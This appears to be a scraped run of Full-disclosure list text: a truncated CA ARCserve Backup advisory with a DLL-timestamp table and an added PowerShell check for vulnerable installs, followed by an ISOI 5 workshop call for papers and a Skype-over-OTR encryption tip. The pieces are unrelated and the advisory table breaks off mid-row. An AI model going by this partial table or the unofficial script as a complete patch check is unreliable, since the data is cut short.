CA ARCserve Backup r12.0 Windows, CA ARCserve Backup r11.5 Windows, CA ARCserve Backup r11.1 Windows, CA ARCserve Backup r11.1 Netware, CA Protection Suites r2*:
1. Using Windows Explorer, locate the file "asbrdcst.dll". By default, the file is located in the "C:\Program Files\CA\SharedComponents\ARCserve Backup\CADS" directory on 32 bit systems and "C:\Program Files (x86)\CA\SharedComponents\ARCserve Backup\CADS" on 64 bit systems.
2. Right click on the file and select Properties.
3. Select the General tab.
4. If the file timestamp is earlier than indicated in the below table, the installation is vulnerable.

* For Protection Suites r2, use the file timestamp for CA ARCserve Backup r11.5 English

Product Ver    Product Lang   File Name      File Sz (bytes)   Timestamp
12.0 Windows   English        asbrdcst.dll   324872            05/01/2008 12:11
12.0 Windows   Spanish        asbrdcst.dll   324872            05/01/2008 12:11
12.0 Windows   Port-Braz      asbrdcst.dll   320776            05/01/2008 12:11
12.0 Windows   Japanese       asbrdcst.dll   320776            05/01/2008 12:11
12.0 Windows   Italian        asbrdcst.dll   324872            05/01/2008 12:11
12.0 Windows   German         asbrdcst.dll   324872            05/01/2008 12:11
12.0 Windows   French         asbrdcst.dll   324872            05/01/2008 12:11
12.0 Windows   Trad Chinese   asbrdcst.dll   316680            05/01/2008 12:11
12.0 Windows   Simp Chinese   asbrdcst.dll   316680            05/01/2008 12:11
11.5 Windows   English        asbrdcst.dll   212992            04/22/2008 10:15:02
11.5 Windows   Japanese       asbrdcst.dll   208896            04/22/2008 14:28:52
11.5 Windows   Simp Chinese   asbrdcst.dll   204800            04/22/2008 14:30:54
11.5 Windows   Trad Chinese   asbrdcst.dll   204800            04/22/2008 14:33:28
11.5 Windows   Italian        asbrdcst.dll   212992            04/22/2008 14:31:46
11.5 Windows   Port-Braz      asbrdcst.dll   212992            04/22/2008 14:53:54
11.5 Windows   German         asbrdcst.dll   212992            04/22/2008 14:27:48
11.5 Windows   French         asbrdcst.dll   212992            04/22/2008 14:26:54
11.5 Windows   Spanish        asbrdcst.dll   212992            04/22/2008 14:32:38
11.1 Windows   English        asbrdcst.dll   204800            04/24/2008 11:21:26
11.1 Windows   Japanese       asbrdcst.dll   200704            04/24/2008 11:25:48
11.1 Windows   Simp Chinese   asbrdcst.dll   196608            04/24/2008 11:27:44
11.1 Windows   Trad Chinese   asbrdcst.dll   196608            04/24/2008 11:30:32
11.1 Windows   Italian        asbrdcst.dll   204800            04/24/2008 11:28:38
11.1 Windows   Port-Braz      asbrdcst.dll   204800            04/24/2008 11:38:52
11.1 Windows   German         asbrdcst.dll   204800            04/24/2008 11:24:38
11.1 Windows   French         asbrdcst.dll   204800            04/24/2008 11:23:38
11.1 Windows   Spanish        asbrdcst.dll   204800            04/24/2008 11:29:34
11.1 Windows   Dutch          asbrdcst.dl
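The manual Explorer procedure above does not scale across a fleet. The following PowerShell is an added example, not CA's own utility, that performs the same timestamp comparison from the command line using the rows of the advisory's table that are complete in this copy; the operator supplies the product version and language. It assumes the advisory's timestamps are expressed in the installation's local time and that the file sits in one of the two default directories the advisory names. For r12.0 the Patch Management utility's "QO99574" status remains the authoritative check.

```powershell
param(
    [Parameter(Mandatory = $true)][ValidateSet('12.0', '11.5', '11.1')][string]$ProductVersion,
    [string]$Language = 'English'
)

# (version|language) -> timestamp of the patched asbrdcst.dll, copied from the advisory table.
# The 11.1 Dutch row is cut off in the advisory text and is therefore not included.
$Fixed = @{
    '12.0|English' = '05/01/2008 12:11';   '12.0|Spanish' = '05/01/2008 12:11'
    '12.0|Port-Braz' = '05/01/2008 12:11'; '12.0|Japanese' = '05/01/2008 12:11'
    '12.0|Italian' = '05/01/2008 12:11';   '12.0|German' = '05/01/2008 12:11'
    '12.0|French' = '05/01/2008 12:11';    '12.0|Trad Chinese' = '05/01/2008 12:11'
    '12.0|Simp Chinese' = '05/01/2008 12:11'
    '11.5|English' = '04/22/2008 10:15:02'; '11.5|Japanese' = '04/22/2008 14:28:52'
    '11.5|Simp Chinese' = '04/22/2008 14:30:54'; '11.5|Trad Chinese' = '04/22/2008 14:33:28'
    '11.5|Italian' = '04/22/2008 14:31:46'; '11.5|Port-Braz' = '04/22/2008 14:53:54'
    '11.5|German' = '04/22/2008 14:27:48';  '11.5|French' = '04/22/2008 14:26:54'
    '11.5|Spanish' = '04/22/2008 14:32:38'
    '11.1|English' = '04/24/2008 11:21:26'; '11.1|Japanese' = '04/24/2008 11:25:48'
    '11.1|Simp Chinese' = '04/24/2008 11:27:44'; '11.1|Trad Chinese' = '04/24/2008 11:30:32'
    '11.1|Italian' = '04/24/2008 11:28:38'; '11.1|Port-Braz' = '04/24/2008 11:38:52'
    '11.1|German' = '04/24/2008 11:24:38';  '11.1|French' = '04/24/2008 11:23:38'
    '11.1|Spanish' = '04/24/2008 11:29:34'
}

$key = "$ProductVersion|$Language"
if (-not $Fixed.ContainsKey($key)) { throw "No advisory row for $key" }
# Invariant culture so MM/dd/yyyy parses the same way on every locale.
$threshold = [datetime]::Parse($Fixed[$key], [cultureinfo]::InvariantCulture)

# Default install locations from the advisory (32-bit and 64-bit systems).
$roots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }
$candidates = $roots | ForEach-Object {
    Join-Path $_ 'CA\SharedComponents\ARCserve Backup\CADS\asbrdcst.dll'
}

$dll = $candidates | Where-Object { Test-Path -LiteralPath $_ } | Select-Object -First 1
if (-not $dll) {
    Write-Output 'asbrdcst.dll not found in the default locations; locate it manually (step 1 above).'
    return
}

$item = Get-Item -LiteralPath $dll
if ($item.LastWriteTime -lt $threshold) {
    Write-Output ("VULNERABLE: {0} last written {1}; patched file is dated {2}" -f $dll, $item.LastWriteTime, $threshold)
} else {
    Write-Output ("Patched or newer: {0} last written {1}" -f $dll, $item.LastWriteTime)
}
```

Run it as .\Check-Asbrdcst.ps1 -ProductVersion 11.5 -Language German on the backup server. File timestamps can be disturbed by copies and restores, so treat a "patched" verdict as supporting evidence and confirm the size column from the table or the Patch Management status before closing the finding.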
[Full-disclosure] Announcement && CFP: ISOI 5, Tallinn Estonia
The Internet Security Operations and Intelligence (ISOI) 5th workshop will take place on the 11th and 12th of September, 2008.

Venue: Tallinn, Estonia.
Host: Estonian CERT (www.cert.ee).

Attendance: While payment is not required, to attend you must be a member of one of the vetted operational communities, or contact us directly for special consideration.

CFP information: The topics for the CFP include operational NSP security, Internet incident response, Internet fraud, cyber crime investigations and general case studies. You can email your suggestions, including a title, short abstract and preferred day and time, to me personally up to the 28th of July. Late submissions for turbo-talks are possible.

For more information you can check out the web pages for previous ISOI workshops:

Yahoo - http://isotf.org/isoi44html
ICANN/ISOC/Afilias - http://isotf.org/isoi3.html
Microsoft - http://isotf.org/isoi2.html
Cisco - http://isotf.org/isoi.html

A preliminary program will become available in a few weeks on:
http://isotf.org/isoi5.html

Gadi Evron && Randy Vaughn.
[Full-disclosure] Skype chat encryption with OTR
For all you OS X guys that like Skype because of its usability but are concerned about the lack of an end-to-end message encryption system (a plug-in for Skype).

Today I tried:

#1 Get and install Adium (I suggest portable Adium in a separate FileVault volume)
http://www.freesmug.org/portableapps/adium/

#2 Get and install the Skype plug-in for Adium
http://myjobspace.co.nz/images/pidgin/

#3 Enable OTR encryption on Skype chat (through the Adium client)
http://www.cypherpunks.ca/otr/

Et voilà, end-to-end deniable encryption for Skype chat messages.

The funny thing is that you can see the encrypted chat and key exchange in the standard Skype messaging window, so you can verify yourself that everything is enciphered.

Now I feel more comfortable and will sleep +10 minutes each night.

Cheers
Fabio/naif